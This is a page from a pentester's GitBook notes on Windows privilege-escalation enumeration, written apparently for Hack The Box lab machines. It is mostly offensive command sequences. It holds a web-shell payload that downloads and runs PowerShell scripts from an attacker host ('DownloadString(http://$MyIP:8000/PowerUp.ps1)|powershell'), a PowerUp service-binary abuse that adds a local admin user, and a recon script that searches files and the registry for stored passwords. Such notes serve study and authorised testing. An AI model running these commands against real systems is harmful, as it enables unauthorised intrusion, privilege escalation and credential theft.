Pentest
  • Homepage
  • Pentest Links
  • 01 Prep
    • Target Inventory
    • OSINT and Dorks
    • Recon-ng dns zone snoop
    • ❤️Gitbook
  • 02 Scan
    • *Favorites
    • Burp
    • Dirb nikto wpscan etc
    • Enum Finger and Brute SSH
    • Fuzzing
    • Nmap
    • Open Port Checks OneLiner
    • Port Knocking
    • SSL Issues
    • Tcpdump
  • 03 Getting In
    • Char Evasion Tricks
    • Email SMTP
    • Eternal Blue
    • FTP
    • heartbleed
    • Metasploit
    • MySql
    • NFS
    • Oracle
    • Postgres
    • PowerShell Empire
    • Shells
    • rpc
    • SMB Samba
    • SSH Tips
    • SQLite3
    • Veil
  • 04 WebApps
    • Apache
    • Blogs
    • Coldfusion
    • Content Management (CMS)
    • Drupal
    • Elastix FreePBX
    • HttpFileServer (HFS)
    • IIS
    • IIS6 WebDav
    • Local File Inclusion (LFI)
    • Magento
    • Nagios
    • PFSense
    • php
    • php type juggling
    • phpLite
    • Web Injections
    • Javascript
    • Shellshock
    • SQL Injections (sqli)
    • SQLMap
    • WAF
    • Webmin
    • Web Scrape
    • Wordpress
  • 05 Passwords & Ciphers
    • Cipher Decrypt
    • Cipher RSA Wiener P-Q-E
    • Cracking
    • Dict Guess List Mangle
    • Get Hashes
    • Hydra Brutes
    • Images Exif Steg
    • Malware Analysis
    • Pull Hashes PCredz
    • SSH PrivKey Passphrase
    • Unzip Crack
    • Windows PW
  • 06 Linux PrivEsc
    • 1 Look Around
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • binaries
    • Buffer Overflow
    • bash prison
    • Monitor Files
    • mongodb node
    • Pivots
    • Remote Execute
    • Shell TTY Fix
    • TAR backups
    • Transfer Files
    • vnc
  • 07 Windows PrivEsc
    • 1 Windows cmd kungfu
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • Bloodhound
    • DLL Hijack MSF
    • Kerberos
    • Memory Analysis
    • NTDS
    • Powershell
    • Responder
    • Saved Creds runas
Powered by GitBook
On this page
  • Enumeration:
  • systeminfo
  • google
  • Tasklist
  • Windows Exploit Suggester
  • WES
  • WESng
  • Kernel Exploits
  • Check Perms
  • User whoami privs
  • Windows Service Configuration Viewer
  • Watson
  • Sherlock
  • UACME
  • UAC Bypass
  • BeRoot
  • PowerUp Scan
  • PowerUp Abuse
  • SharpUp
  • Seatbelt
  • winPEAS
  • accesschk
  • Quick-Paste-Report
  • Problems
  • More...

Was this helpful?

  1. 07 Windows PrivEsc

2 Enums

Previous1 Windows cmd kungfuNext3 PrivEsc

Last updated 2 years ago

Was this helpful?

Enumeration:

  1. Check your username and groups:

    1. whoami

    2. whoami /priv

    3. netuser me

  2. winPEAS fast, searchfast, cmd

  3. Seatbelt and other scripts

  4. If scripts fail, run manually

  5. Other Win PrivEsc Cheatsheets:

    1. --Windows Enums

systeminfo                ..OS build, Proc:x64, OS:x86 - Suggester
hostname
whoami /priv              ..for Token Impersonation (Potato Exploits)
net users
net user Administrator
cmdkey /list              ..look for saved passwords

systeminfo

  • Find Kernel Exploits with systeminfo and WES

  • They can cause system-crash

  • Find matching exploits: google, exploitdb, github

cd C:/Windows/Temp
> systeminfo > sys.txt
> copy sys.txt \\10.x.x.x\share\ .

N/A hotfixes?
Confirm here:
dir C:\Windows\SoftwareDistribution\Download    ..prep from wsus
type C:\Windows\WindowsUpdate.log               ..actual update logs

google

whoami
hostname
systeminfo   .. OS, Version, Hotfixes

google: "windows server 2008 6.1.7600 N/A Build 7600 privilege Escalation"
google: "windows 7 enterprise 6.1.7600 priv esc vulnerabilities"

found: 
github/abatchy17/WindowsExploits > 
MS11-046.exe, MS10-059.exe     ..failed
Github/Re4son/chimichurri.exe  ..worked (arctic-htb)
and
MS11-046 (AFD PrivEsc)         ..develHTB

Tasklist

tasklist /V

Windows Exploit Suggester

  • Lots of findings.. just have to look through them!

windows-exploit-suggester.py --database 2019-08-27-mssb.xls --systeminfo sys.txt

WES

curl -k "https://raw.githubusercontent.com/bitsadmin/wesng/master/wes.py" > ./wes.py
python3 wes.py --update 
python wes.py /share/systeminfo.txt -i 'Elevation of Privilege' --exploits-only | more
python wes.py ./sys.txt -s critical -i "Remote Code Execution"

WESng

  • Based on win-ver and patch level

> curl -k "https://raw.githubusercontent.com/bitsadmin/wesng/master/wes.py" > ./wes.py
> python3 wes.py --update 
> python wes.py systeminfo.txt -i 'Elevation of Privilege' --exploits-only
> python ./wes.py ~/htb/arctic/systeminfo.txt -i 'Elevation of Privilege' --exploits-only  

Kernel Exploits

  • Compare to 'systeminfo' report

Check Perms

accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe" 
accesschk.exe /accepteula -quv user CleanUp.ps1

User whoami privs

Privs give yours special rights

whoami /priv

Note: if listed you have it! even if it says 'disabled' you still have it!

  • SeBackupPrivilege Grants read access to ALL objects Could find sensitive files/hashes/registry\

  • SeRestorePrivilege Grants write to all objects overwrite binaries/dlls/registry\

  • SeTakeOwnerPrivilege Can take ownership and write overwrite binaries/dlls/registry\

  • Advanced: SeTcbPrivilege SeCreateTokenPrivilege SeLoadDriverPrivilege SeDebugPrivilege (used in getsystem)

Windows Service Configuration Viewer

  • Check for misconfigs in services that can lead to privilege escalation.

  • You can replace the executable with your own

  • and have windows execute whatever code you want as the privileged user.

icacls scsiaccess.exe

scsiaccess.exe
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
Everyone:(I)(F)

Watson

  • Dot Net tool that Finds Missing Patches

  • Check targets .NET version and Build that Version in VisualStudio

> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
.NET v3.5
Build > Your version: OSx86

\\10.10.14.34\share\Watson.exe
Watson Found 5 Vulns
Including: MS11-046

Sherlock

locate Sherlock.ps1
cp Sherlock.ps1 .
dos2unix Sherlock.ps1  ..fixed some bad unicode (at beginning)
vim Sherlock.ps1
Find-AllVulns          ..add as last line

http://10.x.x.x/ippsec.php?fexec=
=echo IES(New-Object Net.WebClient).DownloadString('http://$MyIP:8000/Sherlock.ps1')|powershell -noprofile -

Found: 
MS15-051 ClientCopyImage not-vulnerable (but ippsec disagrees, try this)
MS16-016 WebDAV ..requires 2 processors and race-condition ..lets ignore

UACME

  • Tries 30+ ways to PrivEsc

  • "You AC Me Bro"

UAC Bypass

  • User Account Control

  • Metasploit has 'bypassuac' for Windows7

  • PowerShell Empire that prompts in a nice way

BeRoot

  • Check for misconfigs in Win or Linux

  • C:\Tools\beRoot.exe

  • Found lots of vulns for PrivEsc

PowerUp Scan

  • Powershell script to find PrivEsc Vulns and Exploit

  • PowerShell > PowerShellEmpire > PowerUp.ps1

locate PowerUp.ps1  (empire)
cp PowerUp.ps1 . 
vim 'Invoke-AllChecks'  ..Add as last line
python -m SimpleHTTPServer

Send to Victim (ex: Drupal)
http://10.x.x.x/ippsec.php?fexec=systeminfo
=echo IES(New-Object Net.WebClient).DownloadString('http://$MyIP:8000/PowerUp.ps1')|powershell -noprofile -

Found a few 'writable directories' for oracle, but nothing great
ex: c:\oracle\ora90\bin
netstat -an     ..3306 mysql, but not oracle (1521)

PowerUp Abuse

  • Abuse functions ..

    • Write-UserAddMSI

    • Write-ServiceBinary .. Will create user 'john' with password123 as admin!

locate PowerUp.ps1
cp PowerUp.ps1 .
python -m SimpleHTTPServer        ..Share

Send the file to victim           ..example from Drupal
http://10.x.x.x/ippsec.php?fexec=systeminfo
=echo IES(New-Object Net.WebClient).DownloadString('http://$MyIP:8000/PowerUp.ps1')|powershell -noprofile -

PS> Import-Module .\PowerUp.ps1   ..run as Admin if you can
PS> Invoke-AllChecks              ..Scan

----------------------------------
Found: Unquoted Path:
C:\Program Files\VideoStream\1337 Log\Checklog.exe

Exploit:
Will create a new user 'john' with Password 123! and Local Admin!
(after a reboot/service restart)
PS> Write-ServiceBinary -ServiceName 'Video Stream' -ServicePath ""C:\Program Files\VideoStream\1337.exe""

SharpUp

win ps or cmd: 
> SharpUp.exe

Seatbelt

Enumeration but doesnt hunt for privesc

Seatbelt.exe ...help 
Seatbelt.exe all 
Seatbelt.exe NonstandardServices

winPEAS

Hunts for privesc, highlights Most powerful tool in this course! Most maintained tool

Enable cmd Colors: reg add HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1

If you cant get colors try running it from kali on reverse-shell

cd:\PrivEsc 
winPEASany.exe -h 
winPEASany.exe                   .. default: all 
winPEASany.exe userinfo
winPEASany.exe quiet procesinfo  .. (yes, misspelled)

accesschk

Older but trustworthy tool to check ACL check access for user/group to file/dir/srv/reg downside: sometimes GUI popup agreement (older vers doesnt)

Quick-Paste-Report

  • Copy/Paste into your remote Windows shell to generate a quick report:

@echo --------- BASIC WINDOWS RECON --------- > report.txt
timeout 1
net config Workstation >> report.txt
timeout 1
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" >> report.txt
timeout 1
hostname >> report.txt
timeout 1
net users >> report.txt
timeout 1
ipconfig /all >> report.txt
timeout 1
route print >> report.txt
timeout 1
arp -A >> report.txt
timeout 1
netstat -ano >> report.txt
timeout 1
netsh firewall show state >> report.txt
timeout 1
netsh firewall show config >> report.txt
timeout 1
schtasks /query /fo LIST /v >> report.txt
timeout 1
tasklist /SVC >> report.txt
timeout 1
net start >> report.txt
timeout 1
DRIVERQUERY >> report.txt
timeout 1
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated >> report.txt
timeout 1
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated >> report.txt
timeout 1
dir /s *pass* == *cred* == *vnc* == *.config* >> report.txt
timeout 1
findstr /si password *.xml *.ini *.txt >> report.txt
timeout 1
reg query HKLM /f password /t REG_SZ /s >> report.txt
timeout 1
reg query HKCU /f password /t REG_SZ /s >> report.txt
timeout 1
dir "C:\"
timeout 1
dir "C:\Program Files\" >> report.txt
timeout 1
dir "C:\Program Files (x86)\"
timeout 1
dir "C:\Users\"
timeout 1
dir "C:\Users\Public\"
timeout 1
echo REPORT COMPLETE!

Problems

Enums failing?
couldnt get watson or winPEAS.exe to work

.NET might be OLD

Example: 'Granny' had v1.0 .NET


> dir C:\Windows\Microsoft.NET\Framework
> reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\NET Framework Setup\NDP"


Consider trying:
Older version of Watson
https://github.com/rasta-mouse/Watson/tree/486ff207270e4f4cadc94ddebfce1121ae7b5437

---------------------------------
---------------------------------
Use the .bat instead!

C:\Temp>winPEAS.bat
winPEAS.bat

Nothing happened?
Prefixing it with cmd /k worked. 
If you check cmd /?, the /k switch Carries out the command specified by string but remains. 
I suspect cmd /c would work as well but never tried that. 


C:\WINDOWS\Temp\Temp>cmd /k winPEAS.bat > output.txt
cmd /k winPEAS.bat > output.txt

Parsing Mof File: C:\WINDOWS\system32\wbem\Cli.mof(Phase Error - 3)
Compiler returned error 0x80041001
etc...
Ok results, but not great...

More...

MS10-059 =

..for recent windows

USE:

SeImpersonatePrivilege Allows impersonate Ex: \

SeAssignPrimaryPrivilege Similar. Enables user to assign access token to new proc. Ex:

Example from

SharpUp - Good if you dont have PowerShell C# Compiled version:

GhostPack/Seatbelt ... Seatbelt.exe

carlospolop winPEAS

TransferFiles
http://www.fuzzysecurity.com/tutorials/16.html
https://github.com/SecWiki/windows-kernel-exploits
https://github.com/bitsadmin/wesng
https://github.com/SecWiki/windows-kernel-exploits
https://github.com/rasta-mouse/Watson
WinKernelExploits
https://github.com/rasta-mouse/Watson
https://github.com/hfiref0x/UACME
https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1
https://github.com/GhostPack/SharpUp
https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
https://github.com/GhostPack/Seatbelt
https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
Juicy Potato
Juicy Potato
DrupalPhpVuln
chimichurri